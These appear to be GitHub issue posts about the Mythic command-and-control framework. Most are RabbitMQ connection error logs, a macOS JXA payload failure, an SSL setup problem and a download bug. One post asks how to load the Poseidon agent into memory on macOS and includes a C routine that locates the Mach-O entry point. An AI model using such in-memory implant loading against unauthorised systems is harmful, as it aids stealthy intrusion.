  File "/usr/local/lib/python3.8/site-packages/aiormq/base.py", line 168, in wrap
    return await self.create_task(func(self, *args, **kwargs))
  File "/usr/local/lib/python3.8/site-packages/aiormq/base.py", line 25, in __inner
    return await self.task
  File "/usr/local/lib/python3.8/site-packages/aiormq/connection.py", line 269, in connect
    await self.__rpc(spec.Connection.Open(virtual_host=self.vhost))
  File "/usr/local/lib/python3.8/site-packages/aiormq/connection.py", line 201, in __rpc
    raise spec.AMQPInternalError(frame, dict(frame))
pamqp.specification.AMQPInternalError: (<pamqp.specification.Connection.Close object at 0x7f1e002d0c40>, {'reply_code': 530, 'reply_text': "NOT_ALLOWED - access to vhost 'mythic_vhost' refused for user 'mythic_user'", 'class_id': 10, 'method_id': 40})
[2021-01-25 08:59:21 +0000] [1] [ERROR] Exception in connect_and_consume connect: (<pamqp.specification.Connection.Close object at 0x7f1e0025bf40>, {'reply_code': 530, 'reply_text': "NOT_ALLOWED - access to vhost 'mythic_vhost' refused for user 'mythic_user'", 'class_id': 10, 'method_id': 40})
Traceback (most recent call last):
  File "/Mythic/app/api/rabbitmq_api.py", line 1152, in connect_and_consume_pt
    connection = await aio_pika.connect_robust(
  File "/usr/local/lib/python3.8/site-packages/aio_pika/robust_connection.py", line 271, in connect_robust
    return await connect(
  File "/usr/local/lib/python3.8/site-packages/aio_pika/connection.py", line 332, in connect
    await connection.connect(
  File "/usr/local/lib/python3.8/site-packages/aio_pika/robust_connection.py", line 127, in connect
    result = await super().connect(
  File "/usr/local/lib/python3.8/site-packages/aio_pika/connection.py", line 120, in connect
    self.connection = await asyncio.wait_for(
  File "/usr/local/lib/python3.8/asyncio/tasks.py", line 455, in wait_for
    return await fut
  File "/usr/local/lib/python3.8/site-packages/aio_pika/connection.py", line 105, in _make_connection
    connection = await aiormq.connect(self.url, **kwargs)
  File "/usr/local/lib/python3.8/site-packages/aiormq/connection.py", line 526, in connect
    await connection.connect(client_properties or {})
  File "/usr/local/lib/python3.8/site-packages/aiormq/base.py", line 168, in wrap
    return await self.create_task(func(self, *args, **kwargs))
  File "/usr/local/lib/python3.8/site-packages/aiormq/base.py", line 25, in __inner
    return await self.task
  File "/usr/local/lib/python3.8/site-packages/aiormq/connection.py", line 269, in connect
    await self.__rpc(spec.Connection.Open(virtual_host=self.vhost))
  File "/usr/local/lib/python3.8/site-packages/aiormq/connection.py", line 201, in __rpc
    raise spec.AMQPInternalError(frame, dict(frame))
pamqp.specification.AMQPInternalError: (<pamqp.specification.Connection.Close object at 0x7f1e0025bf40>, {'reply_code': 530, 'reply_text': "NOT_ALLOWED - access to vhost 'mythic_vhost' refused for user 'mythic_user'", 'class_id': 10, 'method_id': 40})
[2021-01-25 08:59:21 +0000] [1] [ERROR] Exception in connect_and_consume_rpc connect: (<pamqp.specification.Connection.Close object at 0x7f1e0025b3c0>, {'reply_code': 530, 'reply_text': "NOT_ALLOWED - access to vhost 'mythic_vhost' refused for user 'mythic_user'", 'class_id': 10, 'method_id': 40})
Traceback (most recent call last):
  File "/Mythic/app/api/rabbitmq_api.py", line 1191, in connect_and_consume_rpc
    connection = await aio_pika.connect_robust(
  File "/usr/local/lib/python3.8/site-packages/aio_pika/robust_connection.py", line 271, in connect_robust
    return await connect(
  File "/usr/local/lib/python3.8/site-packages/aio_pika/connection.py", line 332, in connect
    await connection.connect(
  File "/usr/local/lib/python3.8/site-packages/aio_pika/robust_connection.py", line 127, in connect
    result = await super().connect(
  File "/usr/local/lib/python3.8/site-packages/aio_pika/connection.py", line 120, in connect
    self.connection = await asyncio.wait_for(
  File "/usr/local/lib/python3.8/asyncio/tasks.py", line 455, in wait_for
    return await fut
  File "/usr/local/lib/python3.8/site-packages/aio_pika/connection.py", line 105, in _make_connection
    connection = await aiormq.connect(self.url, **kwargs)
  File "/usr/local/lib/python3.8/site-packages/aiormq/connection.py", line 526, in connect
    await connection.connect(client_properties or {})
  File "/usr/local/lib/python3.8/site-packages/aiormq/base.py", line 168, in wrap
    return await self.create_task(func(self, *args, **kwargs))
  File "/usr/local/lib/python3.8/site-packages/aiormq/base.py", line 25, in __inner
    return await self.task
  File "/usr/local/lib/python3.8/site-packages/aiormq/connection.py", line 269, in connect
    await self.__rpc(spec.Connection.Open(virtual_host=self.vhost))
  File "/usr/local/lib/python3.8/site-packages/aiormq/connection.py", line 201, in __rpc
    raise spec.AMQPInternalError(frame, dict(frame))
pamqp.specification.AMQPInternalError: (<pamqp.specification.Connection.Close object at 0x7f1e0025b3c0>, {'reply_code': 530, 'reply_text': "NOT_ALLOWED - access to vhost 'mythic_vhost' refused for user 'mythic_user'", 'class_id': 10, 'method_id': 40})
[2021-01-25 08:59:21 +0000] [1] [ERROR] Exception in connect_and_consume connect: (<pamqp.specification.Connection.Close object at 0x7f1e00265200>, {'reply_code': 530, 'reply_text': "NOT_ALLOWED - access to vhost 'mythic_vhost' refused for user 'mythic_user'", 'class_id': 10, 'method_id': 40})
Traceback (most recent call last):
  File "/Mythic/app/api/rabbitmq_api.py", line 1263, in connect_and_consume_heartbeats
    connection = await aio_pika.connect_robust(
  File "/usr/local/lib/python3.8/site-packages/aio_pika/robust_connection.py", line 271, in connect_robust
    return await connect(
  File "/usr/local/lib/python3.8/site-packages/aio_pika/connection.py", line 332, in connect
    await connection.connect(
  File "/usr/local/lib/python3.8/site-packages/aio_pika/robust_connection.py", line 127, in connect
    result = await super().connect(
  File "/usr/local/lib/python3.8/site-packages/aio_pika/connection.py", line 120, in connect
    self.connection = await asyncio.wait_for(
  File "/usr/local/lib/python3.8/asyncio/tasks.py", line 455, in wait_for
    return await fut
  File "/usr/local/lib/python3.8/site-packages/aio_pika/connection.py", line 105, in _make_connection
    connection = await aiormq.connect(self.url, **kwargs)
  File "/usr/local/lib/python3.8/site-packages/aiormq/connection.py", line 526, in connect
    await connection.connect(client_properties or {})
  File "/usr/local/lib/python3.8/site-packages/aiormq/base.py", line 168, in wrap
    return await self.create_task(func(self, *args, **kwargs))
  File "/usr/local/lib/python3.8/site-packages/aiormq/base.py", line 25, in __inner
    return await self.task
  File "/usr/local/lib/python3.8/site-packages/aiormq/connection.py", line 269, in connect
    await self.__rpc(spec.Connection.Open(virtual_host=self.vhost))
  File "/usr/local/lib/python3.8/site-packages/aiormq/connection.py", line 201, in __rpc
    raise spec.AMQPInternalError(frame, dict(frame))
pamqp.specification.AMQPInternalError: (<pamqp.specification.Connection.Close object at 0x7f1e00265200>, {'reply_code': 530, 'reply_text': "NOT_ALLOWED - access to vhost 'mythic_vhost' refused for user 'mythic_user'", 'class_id': 10, 'method_id': 40})
[2021-01-25 08:59:21 +0000] [1] [ERROR] Exception in connect_and_consume connect: (<pamqp.specification.Connection.Close object at 0x7f1e00205c00>, {'reply_code': 530, 'reply_text': "NOT_ALLOWED - access to vhost 'mythic_vhost' refused for user 'mythic_user'", 'class_id': 10, 'method_id': 40})
Traceback (most recent call last):
  File "/Mythic/app/api/rabbitmq_api.py", line 1112, in connect_and_consume_c2
    connection = await aio_pika.connect_robust(
  File "/usr/local/lib/python3.8/site-packages/aio_pika/robust_connection.py", line 271, in connect_robust
    return await connect(
  File "/usr/local/lib/python3.8/site-packages/aio_pika/connection.py", line 332, in connect
    await connection.connect(
  File "/usr/local/lib/python3.8/site-packages/aio_pika/robust_connection.py", line 127, in connect
    result = await super().connect(
  File "/usr/local/lib/python3.8/site-packages/aio_pika/connection.py", line 120, in connect
    self.connection = await asyncio.wait_for(
  File "/usr/local/lib/python3.8/asyncio/tasks.py", line 455, in wait_for
    return await fut
  File "/usr/local/lib/python3.8/site-packages/aio_pika/connection.py", line 105, in _make_connection
    connection = await aiormq.connect(self.url, **kwargs)
  File "/usr/local/lib/python3.8/site-packages/aiormq/connection.py", line 526, in connect
    await connection.connect(client_properties or {})
  File "/usr/local/lib/python3.8/site-packages/aiormq/base.py", line 168, in wrap
    return await self.create_task(func(self, *args, **kwargs))
  File "/usr/local/lib/python3.8/site-packages/aiormq/base.py", line 25, in __inner
    return await self.task
  File "/usr/local/lib/python3.8/site-packages/aiormq/connection.py", line 269, in connect
    await self.__rpc(spec.Connection.Open(virtual_host=self.vhost))
  File "/usr/local/lib/python3.8/site-packages/aiormq/connection.py", line 201, in __rpc
    raise spec.AMQPInternalError(frame, dict(frame))
pamqp.specification.AMQPInternalError: (<pamqp.specification.Connection.Close object at 0x7f1e00205c00>, {'reply_code': 530, 'reply_text': "NOT_ALLOWED - access to vhost 'mythic_vhost' refused for user 'mythic_user'", 'class_id': 10, 'method_id': 40})
[2021-01-25 08:59:23 +0000] [1] [INFO]  [*] Waiting for messages in connect_and_consume_rpc.
[2021-01-25 08:59:23 +0000] [1] [INFO]  [*] Waiting for messages in connect_and_consume_rpc.
[2021-01-25 08:59:23 +0000] [1] [INFO]  [*] Waiting for messages in connect_and_consume_c2.
[2021-01-25 08:59:23 +0000] [1] [INFO]  [*] Waiting for messages in connect_and_consume_heartbeats.
[2021-01-25 08:59:23 +0000] [1] [INFO]  [*] Waiting for messages in connect_and_consume_pt.
[2021-01-25 08:59:26 +0000] - (sanic.access)[INFO][192.168.3.175:51633]: POST http://192.168.3.172:7443/login  200 34970
[2021-01-25 08:59:27 +0000] - (sanic.access)[INFO][192.168.3.175:51633]: GET http://192.168.3.172:7443/  200 44415
[2021-01-25 08:59:27 +0000] [1] [ERROR] Caught random exception within Mythic: Invalid websocket request, <Request: GET /ws/events_notifier/current_operation>
Traceback (most recent call last):
  File "/usr/local/lib/python3.8/site-packages/sanic/websocket.py", line 89, in websocket_handshake
    key = handshake.check_request(request.headers)
  File "/usr/local/lib/python3.8/site-packages/websockets/handshake.py", line 83, in check_request
    raise InvalidUpgrade("Connection", ", ".join(connection))
websockets.exceptions.InvalidUpgrade: invalid Connection header: keep-alive

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.8/site-packages/sanic/app.py", line 937, in handle_request
    response = await response
  File "/usr/local/lib/python3.8/site-packages/sanic/app.py", line 1428, in _websocket_handler
    ws = await protocol.websocket_handshake(request, subprotocols)
  File "/usr/local/lib/python3.8/site-packages/sanic/websocket.py", line 92, in websocket_handshake
    raise InvalidUsage("Invalid websocket request")
sanic.exceptions.InvalidUsage: Invalid websocket request
[2021-01-25 08:59:27 +0000] - (sanic.access)[INFO][192.168.3.175:51635]: GET ws://192.168.3.172:7443/ws/events_notifier/current_operation  404 18
[2021-01-25 08:59:29 +0000] - (sanic.access)[INFO][192.168.3.175:51633]: GET http://192.168.3.172:7443/  200 44415
[2021-01-25 08:59:29 +0000] [1] [ERROR] Caught random exception within Mythic: Invalid websocket request, <Request: GET /ws/events_notifier/current_operation>
Traceback (most recent call last):
  File "/usr/local/lib/python3.8/site-packages/sanic/websocket.py", line 89, in websocket_handshake
    key = handshake.check_request(request.headers)
  File "/usr/local/lib/python3.8/site-packages/websockets/handshake.py", line 83, in check_request
    raise InvalidUpgrade("Connection", ", ".join(connection))
websockets.exceptions.InvalidUpgrade: invalid Connection header: keep-alive

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.8/site-packages/sanic/app.py", line 937, in handle_request
    response = await response
  File "/usr/local/lib/python3.8/site-packages/sanic/app.py", line 1428, in _websocket_handler
    ws = await protocol.websocket_handshake(request, subprotocols)
  File "/usr/local/lib/python3.8/site-packages/sanic/websocket.py", line 92, in websocket_handshake
    raise InvalidUsage("Invalid websocket request")
sanic.exceptions.InvalidUsage: Invalid websocket request
[2021-01-25 08:59:29 +0000] - (sanic.access)[INFO][192.168.3.175:51636]: GET ws://192.168.3.172:7443/ws/events_notifier/current_operation  404 18
[2021-01-25 08:59:29 +0000] - (sanic.access)[INFO][192.168.3.175:51633]: GET http://192.168.3.172:7443/favicon.ico  200 21974
[2021-01-25 08:59:30 +0000] - (sanic.access)[INFO][192.168.3.175:51640]: GET http://192.168.3.172:7443/  200 44415
[2021-01-25 08:59:30 +0000] [1] [ERROR] Caught random exception within Mythic: Invalid websocket request, <Request: GET /ws/events_notifier/current_operation>
Traceback (most recent call last):
  File "/usr/local/lib/python3.8/site-packages/sanic/websocket.py", line 89, in websocket_handshake
    key = handshake.check_request(request.headers)
  File "/usr/local/lib/python3.8/site-packages/websockets/handshake.py", line 83, in check_request
    raise InvalidUpgrade("Connection", ", ".join(connection))
websockets.exceptions.InvalidUpgrade: invalid Connection header: keep-alive

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.8/site-packages/sanic/app.py", line 937, in handle_request
    response = await response
  File "/usr/local/lib/python3.8/site-packages/sanic/app.py", line 1428, in _websocket_handler
    ws = await protocol.websocket_handshake(request, subprotocols)
  File "/usr/local/lib/python3.8/site-packages/sanic/websocket.py", line 92, in websocket_handshake
    raise InvalidUsage("Invalid websocket request")
sanic.exceptions.InvalidUsage: Invalid websocket request
[2021-01-25 08:59:30 +0000] - (sanic.access)[INFO][192.168.3.175:51642]: GET ws://192.168.3.172:7443/ws/events_notifier/current_operation  404 18
[2021-01-25 08:59:31 +0000] - (sanic.access)[INFO][192.168.3.175:51640]: GET http://192.168.3.172:7443/favicon.ico  200 21974
[2021-01-25 08:59:31 +0000] - (sanic.access)[INFO][192.168.3.175:51640]: GET http://192.168.3.172:7443/  200 44415
[2021-01-25 08:59:32 +0000] [1] [ERROR] Caught random exception within Mythic: Invalid websocket request, <Request: GET /ws/events_notifier/current_operation>
Traceback (most recent call last):
  File "/usr/local/lib/python3.8/site-packages/sanic/websocket.py", line 89, in websocket_handshake
    key = handshake.check_request(request.headers)
  File "/usr/local/lib/python3.8/site-packages/websockets/handshake.py", line 83, in check_request
    raise InvalidUpgrade("Connection", ", ".join(connection))
websockets.exceptions.InvalidUpgrade: invalid Connection header: keep-alive

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.8/site-packages/sanic/app.py", line 937, in handle_request
    response = await response
  File "/usr/local/lib/python3.8/site-packages/sanic/app.py", line 1428, in _websocket_handler
    ws = await protocol.websocket_handshake(request, subprotocols)
  File "/usr/local/lib/python3.8/site-packages/sanic/websocket.py", line 92, in websocket_handshake
    raise InvalidUsage("Invalid websocket request")
sanic.exceptions.InvalidUsage: Invalid websocket request
[2021-01-25 08:59:32 +0000] - (sanic.access)[INFO][192.168.3.175:51643]: GET ws://192.168.3.172:7443/ws/events_notifier/current_operation  404 18
[2021-01-25 08:59:32 +0000] - (sanic.access)[INFO][192.168.3.175:51640]: GET http://192.168.3.172:7443/favicon.ico  200 21974
[2021-01-25 09:00:00 +0000] - (sanic.access)[INFO][192.168.3.175:51697]: GET http://192.168.3.172:7443/payloads  200 96152
[2021-01-25 09:00:01 +0000] [1] [ERROR] Caught random exception within Mythic: Invalid websocket request, <Request: GET /ws/events_notifier/current_operation>
Traceback (most recent call last):
  File "/usr/local/lib/python3.8/site-packages/sanic/websocket.py", line 89, in websocket_handshake
    key = handshake.check_request(request.headers)
  File "/usr/local/lib/python3.8/site-packages/websockets/handshake.py", line 83, in check_request
    raise InvalidUpgrade("Connection", ", ".join(connection))
websockets.exceptions.InvalidUpgrade: invalid Connection header: keep-alive

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.8/site-packages/sanic/app.py", line 937, in handle_request
    response = await response
  File "/usr/local/lib/python3.8/site-packages/sanic/app.py", line 1428, in _websocket_handler
    ws = await protocol.websocket_handshake(request, subprotocols)
  File "/usr/local/lib/python3.8/site-packages/sanic/websocket.py", line 92, in websocket_handshake
    raise InvalidUsage("Invalid websocket request")
sanic.exceptions.InvalidUsage: Invalid websocket request
[2021-01-25 09:00:01 +0000] - (sanic.access)[INFO][192.168.3.175:51705]: GET ws://192.168.3.172:7443/ws/events_notifier/current_operation  404 18
[2021-01-25 09:00:01 +0000] [1] [ERROR] Caught random exception within Mythic: Invalid websocket request, <Request: GET /ws/payloads/current_operation>
Traceback (most recent call last):
  File "/usr/local/lib/python3.8/site-packages/sanic/websocket.py", line 89, in websocket_handshake
    key = handshake.check_request(request.headers)
  File "/usr/local/lib/python3.8/site-packages/websockets/handshake.py", line 83, in check_request
    raise InvalidUpgrade("Connection", ", ".join(connection))
websockets.exceptions.InvalidUpgrade: invalid Connection header: keep-alive

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.8/site-packages/sanic/app.py", line 937, in handle_request
    response = await response
  File "/usr/local/lib/python3.8/site-packages/sanic/app.py", line 1428, in _websocket_handler
    ws = await protocol.websocket_handshake(request, subprotocols)
  File "/usr/local/lib/python3.8/site-packages/sanic/websocket.py", line 92, in websocket_handshake
    raise InvalidUsage("Invalid websocket request")
sanic.exceptions.InvalidUsage: Invalid websocket request
[2021-01-25 09:00:01 +0000] - (sanic.access)[INFO][192.168.3.175:51706]: GET ws://192.168.3.172:7443/ws/payloads/current_operation  404 18
[2021-01-25 09:00:01 +0000] - (sanic.access)[INFO][192.168.3.175:51697]: GET http://192.168.3.172:7443/api/v1.4/c2profiles  200 1631
[2021-01-25 09:00:01 +0000] - (sanic.access)[INFO][192.168.3.175:51698]: GET http://192.168.3.172:7443/api/v1.4/payloadtypes  200 25897
[2021-01-25 09:00:06 +0000] - (sanic.access)[INFO][192.168.3.175:51698]: GET http://192.168.3.172:7443/payload_management  200 71218
[2021-01-25 09:00:06 +0000] [1] [ERROR] Caught random exception within Mythic: Invalid websocket request, <Request: GET /ws/events_notifier/current_operation>
Traceback (most recent call last):
  File "/usr/local/lib/python3.8/site-packages/sanic/websocket.py", line 89, in websocket_handshake
    key = handshake.check_request(request.headers)
  File "/usr/local/lib/python3.8/site-packages/websockets/handshake.py", line 83, in check_request
    raise InvalidUpgrade("Connection", ", ".join(connection))
websockets.exceptions.InvalidUpgrade: invalid Connection header: keep-alive

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.8/site-packages/sanic/app.py", line 937, in handle_request
    response = await response
  File "/usr/local/lib/python3.8/site-packages/sanic/app.py", line 1428, in _websocket_handler
    ws = await protocol.websocket_handshake(request, subprotocols)
  File "/usr/local/lib/python3.8/site-packages/sanic/websocket.py", line 92, in websocket_handshake
    raise InvalidUsage("Invalid websocket request")
sanic.exceptions.InvalidUsage: Invalid websocket request
[2021-01-25 09:00:06 +0000] - (sanic.access)[INFO][192.168.3.175:51707]: GET ws://192.168.3.172:7443/ws/events_notifier/current_operation  404 18
[2021-01-25 09:00:06 +0000] [1] [ERROR] Caught random exception within Mythic: Invalid websocket request, <Request: GET /ws/payloads/current_operation>
Traceback (most recent call last):
  File "/usr/local/lib/python3.8/site-packages/sanic/websocket.py", line 89, in websocket_handshake
    key = handshake.check_request(request.headers)
  File "/usr/local/lib/python3.8/site-packages/websockets/handshake.py", line 83, in check_request
    raise InvalidUpgrade("Connection", ", ".join(connection))
websockets.exceptions.InvalidUpgrade: invalid Connection header: keep-alive

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.8/site-packages/sanic/app.py", line 937, in handle_request
    response = await response
  File "/usr/local/lib/python3.8/site-packages/sanic/app.py", line 1428, in _websocket_handler
    ws = await protocol.websocket_handshake(request, subprotocols)
  File "/usr/local/lib/python3.8/site-packages/sanic/websocket.py", line 92, in websocket_handshake
    raise InvalidUsage("Invalid websocket request")
sanic.exceptions.InvalidUsage: Invalid websocket request
[2021-01-25 09:00:06 +0000] - (sanic.access)[INFO][192.168.3.175:51708]: GET ws://192.168.3.172:7443/ws/payloads/current_operation  404 18
[2021-01-25 09:05:01 +0000] - (sanic.access)[INFO][192.168.3.175:52049]: GET http://192.168.3.172:7443/operations_management  200 71684
[2021-01-25 09:05:01 +0000] [1] [ERROR] Caught random exception within Mythic: Invalid websocket request, <Request: GET /ws/events_notifier/current_operation>
Traceback (most recent call last):
  File "/usr/local/lib/python3.8/site-packages/sanic/websocket.py", line 89, in websocket_handshake
    key = handshake.check_request(request.headers)
  File "/usr/local/lib/python3.8/site-packages/websockets/handshake.py", line 83, in check_request
    raise InvalidUpgrade("Connection", ", ".join(connection))
websockets.exceptions.InvalidUpgrade: invalid Connection header: keep-alive

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.8/site-packages/sanic/app.py", line 937, in handle_request
    response = await response
  File "/usr/local/lib/python3.8/site-packages/sanic/app.py", line 1428, in _websocket_handler
    ws = await protocol.websocket_handshake(request, subprotocols)
  File "/usr/local/lib/python3.8/site-packages/sanic/websocket.py", line 92, in websocket_handshake
    raise InvalidUsage("Invalid websocket request")
sanic.exceptions.InvalidUsage: Invalid websocket request
[2021-01-25 09:05:01 +0000] - (sanic.access)[INFO][192.168.3.175:52058]: GET ws://192.168.3.172:7443/ws/events_notifier/current_operation  404 18
[2021-01-25 09:05:01 +0000] - (sanic.access)[INFO][192.168.3.175:52049]: GET http://192.168.3.172:7443/api/v1.4/operations/  200 215
[2021-01-25 09:05:01 +0000] - (sanic.access)[INFO][192.168.3.175:52060]: GET http://192.168.3.172:7443/api/v1.4/operators/me  200 1344
[2021-01-25 09:05:01 +0000] - (sanic.access)[INFO][192.168.3.175:52049]: GET http://192.168.3.172:7443/api/v1.4/operations/disabled_commands_profiles  200 51
[2021-01-25 09:05:02 +0000] - (sanic.access)[INFO][192.168.3.175:52059]: GET http://192.168.3.172:7443/api/v1.4/commands/  200 74444
[Errno 111] Connect call failed ('127.0.0.1', 5672)
[Errno 111] Connect call failed ('127.0.0.1', 5672)
[Errno 111] Connect call failed ('127.0.0.1', 5672)
[Errno 111] Connect call failed ('127.0.0.1', 5672)
[Errno 111] Connect call failed ('127.0.0.1', 5672)
[Errno 111] Connect call failed ('127.0.0.1', 5672)
[Errno 111] Connect call failed ('127.0.0.1', 5672)
[Errno 111] Connect call failed ('127.0.0.1', 5672)
[Errno 111] Connect call failed ('127.0.0.1', 5672)
[Errno 111] Connect call failed ('127.0.0.1', 5672)
[Errno 111] Connect call failed ('127.0.0.1', 5672)
[Errno 111] Connect call failed ('127.0.0.1', 5672)
[Errno 111] Connect call failed ('127.0.0.1', 5672)
[Errno 111] Connect call failed ('127.0.0.1', 5672)
[Errno 111] Connect call failed ('127.0.0.1', 5672)
(<pamqp.specification.Connection.Close object at 0x7f726f7fc180>, {'reply_code': 530, 'reply_text': 'NOT_ALLOWED - vhost mythic_vhost not found', 'class_id': 10, 'method_id': 40})
(<pamqp.specification.Connection.Close object at 0x7f72700a5e40>, {'reply_code': 530, 'reply_text': "NOT_ALLOWED - access to vhost 'mythic_vhost' refused for user 'mythic_user'", 'class_id': 10, 'method_id': 40})
(<pamqp.specification.Connection.Close object at 0x7f726f7fc340>, {'reply_code': 530, 'reply_text': "NOT_ALLOWED - access to vhost 'mythic_vhost' refused for user 'mythic_user'", 'class_id': 10, 'method_id': 40})
Listening for c2.modify.dynamicHTTP.#
[Errno 111] Connect call failed ('127.0.0.1', 5672)
[Errno 111] Connect call failed ('127.0.0.1', 5672)
[Errno 111] Connect call failed ('127.0.0.1', 5672)
[Errno 111] Connect call failed ('127.0.0.1', 5672)
[Errno 111] Connect call failed ('127.0.0.1', 5672)
[Errno 111] Connect call failed ('127.0.0.1', 5672)
[Errno 111] Connect call failed ('127.0.0.1', 5672)
[Errno 111] Connect call failed ('127.0.0.1', 5672)
[Errno 111] Connect call failed ('127.0.0.1', 5672)
[Errno 111] Connect call failed ('127.0.0.1', 5672)
[Errno 111] Connect call failed ('127.0.0.1', 5672)
[Errno 111] Connect call failed ('127.0.0.1', 5672)
[Errno 111] Connect call failed ('127.0.0.1', 5672)
[Errno 111] Connect call failed ('127.0.0.1', 5672)
[Errno 111] Connect call failed ('127.0.0.1', 5672)
(<pamqp.specification.Connection.Close object at 0x7f7697ad3dc0>, {'reply_code': 530, 'reply_text': 'NOT_ALLOWED - vhost mythic_vhost not found', 'class_id': 10, 'method_id': 40})
(<pamqp.specification.Connection.Close object at 0x7f7697a5e780>, {'reply_code': 530, 'reply_text': "NOT_ALLOWED - access to vhost 'mythic_vhost' refused for user 'mythic_user'", 'class_id': 10, 'method_id': 40})
(<pamqp.specification.Connection.Close object at 0x7f7697a77cc0>, {'reply_code': 530, 'reply_text': "NOT_ALLOWED - access to vhost 'mythic_vhost' refused for user 'mythic_user'", 'class_id': 10, 'method_id': 40})
Listening for c2.modify.HTTP.#
[Errno 111] Connect call failed ('127.0.0.1', 5672)
[Errno 111] Connect call failed ('127.0.0.1', 5672)
[Errno 111] Connect call failed ('127.0.0.1', 5672)
[Errno 111] Connect call failed ('127.0.0.1', 5672)
[Errno 111] Connect call failed ('127.0.0.1', 5672)
[Errno 111] Connect call failed ('127.0.0.1', 5672)
[Errno 111] Connect call failed ('127.0.0.1', 5672)
[Errno 111] Connect call failed ('127.0.0.1', 5672)
[Errno 111] Connect call failed ('127.0.0.1', 5672)
[Errno 111] Connect call failed ('127.0.0.1', 5672)
[Errno 111] Connect call failed ('127.0.0.1', 5672)
[Errno 111] Connect call failed ('127.0.0.1', 5672)
[Errno 111] Connect call failed ('127.0.0.1', 5672)
[Errno 111] Connect call failed ('127.0.0.1', 5672)
[Errno 111] Connect call failed ('127.0.0.1', 5672)
(<pamqp.specification.Connection.Close object at 0x7f840725e380>, {'reply_code': 530, 'reply_text': 'NOT_ALLOWED - vhost mythic_vhost not found', 'class_id': 10, 'method_id': 40})
(<pamqp.specification.Connection.Close object at 0x7f8407250a40>, {'reply_code': 530, 'reply_text': "NOT_ALLOWED - access to vhost 'mythic_vhost' refused for user 'mythic_user'", 'class_id': 10, 'method_id': 40})
(<pamqp.specification.Connection.Close object at 0x7f840725e2c0>, {'reply_code': 530, 'reply_text': "NOT_ALLOWED - access to vhost 'mythic_vhost' refused for user 'mythic_user'", 'class_id': 10, 'method_id': 40})
Listening for c2.modify.leviathan-websocket.#
[Errno 111] Connect call failed ('127.0.0.1', 5672)
[Errno 111] Connect call failed ('127.0.0.1', 5672)
[Errno 111] Connect call failed ('127.0.0.1', 5672)
[Errno 111] Connect call failed ('127.0.0.1', 5672)
[Errno 111] Connect call failed ('127.0.0.1', 5672)
[Errno 111] Connect call failed ('127.0.0.1', 5672)
[Errno 111] Connect call failed ('127.0.0.1', 5672)
[Errno 111] Connect call failed ('127.0.0.1', 5672)
[Errno 111] Connect call failed ('127.0.0.1', 5672)
[Errno 111] Connect call failed ('127.0.0.1', 5672)
[Errno 111] Connect call failed ('127.0.0.1', 5672)
[Errno 111] Connect call failed ('127.0.0.1', 5672)
[Errno 111] Connect call failed ('127.0.0.1', 5672)
[Errno 111] Connect call failed ('127.0.0.1', 5672)
ACCESS_REFUSED - Login was refused using authentication mechanism PLAIN. For details see the broker logfile.
(<pamqp.specification.Connection.Close object at 0x7f92a2096480>, {'reply_code': 530, 'reply_text': 'NOT_ALLOWED - vhost mythic_vhost not found', 'class_id': 10, 'method_id': 40})
(<pamqp.specification.Connection.Close object at 0x7f92a2083840>, {'reply_code': 530, 'reply_text': "NOT_ALLOWED - access to vhost 'mythic_vhost' refused for user 'mythic_user'", 'class_id': 10, 'method_id': 40})
Listening for c2.modify.websocket.#

any idea what I am missing here or what is causing this? thanks in advance.

Catalina Payload Error

Hi,

Im trying to get the jxa payload to work in Catalina (10.15.3) (I'm using the tcs branch which i saw had some changes designed for it in there).

When running it in the script editor for debugging i get an error within the negotiate_key function on the following line, looks like either b64_exported_public is undefined or that the base64EncodedStringWithOptions method doesn't exist.

b64_exported_public = b64_exported_public.base64EncodedStringWithOptions(0).js;

Is there anything else i can try?

Thanks
Rob

Poseidon - issues with parsing macho file

For macos, I am trying to parse the poseidon binary so that I can execute it in memory. Originally I noticed that the file is compiled without the PIE (position independent execution) flag which caused seg-faults, but I changed the build flags in builder.py https://github.com/its-a-feature/Mythic/blob/master/Payload_Types/poseidon/mythic/agent_functions/builder.py#L84-L89 to -buildmode=pie, which generated a poseidon binary with PIE flags. This binary runs when placed on disk. However, it fails to be executed into memory, and the problem appears to be related to finding the entrypt in the Mach-O image. I am trying to follow https://blogs.blackberry.com/en/2017/02/running-executables-on-macos-from-memory to do this, but keep getting an error when using this specific code:

int find_epc(unsigned long base, struct entry_point_command **entry) {
	// find the entry point command by searching through base's load commands

	struct mach_header_64 *mh;
	struct load_command *lc;

	unsigned long text = 0;

	*entry = NULL;

	mh = (struct mach_header_64 *)base;
	lc = (struct load_command *)(base + sizeof(struct mach_header_64));
	for(int i=0; i<mh->ncmds; i++) {
		if(lc->cmd == LC_MAIN) {	//0x80000028
			*entry = (struct entry_point_command *)lc;
			return 0;
		}

		lc = (struct load_command *)((unsigned long)lc + lc->cmdsize);
	}

	return 1;
}

Wondering if anyone else has had the same issue with Golang binaries, as this approach seems to work fine with all other Machos I have tested it with.

SSL Setup.

Hey,

Having some issues in assigning SSL certs to the system. It works perfect with self-signed certs that are generated during setup. I have Letsencrypt certs and attempting to use them similar too:

ssl_cert_path = '/etc/letsencrypt/live/xxx/cert.pem'
ssl_key_path = '/etc/letsencrypt/live/xxx/privkey.pem'

converted to key file. like: ssl_key_path = '/etc/letsencrypt/live/xxx/private.key'

I've moved to different directory (within home directory) thinking that might be the issues, renames to apfell-* incase its a naming issue. every time do this and run start again, altered permissions. Same issues always appears:

CONTAINER ID        IMAGE               COMMAND                  CREATED              STATUS                          PORTS               NAMES
a027b5f141dc        apfell_apfell       "./wait-for-postgres…"   About a minute ago   Exited (0) About a minute ago                       apfell_apfell
02ef8d7401b0        apfell_rabbitmq     "/init.sh"               4 hours ago          Up About a minute                                   apfell_rabbitmq
e462933f4dee        apfell_postgres     "docker-entrypoint.s…"   4 hours ago          Up About a minute                                   apfell_postgres

Issues with the apfell_apfell container.

probably a quick fix or something i missed. any help would be great.

thanks!

Bug: The `download` command from Atlas Payload seems not working.

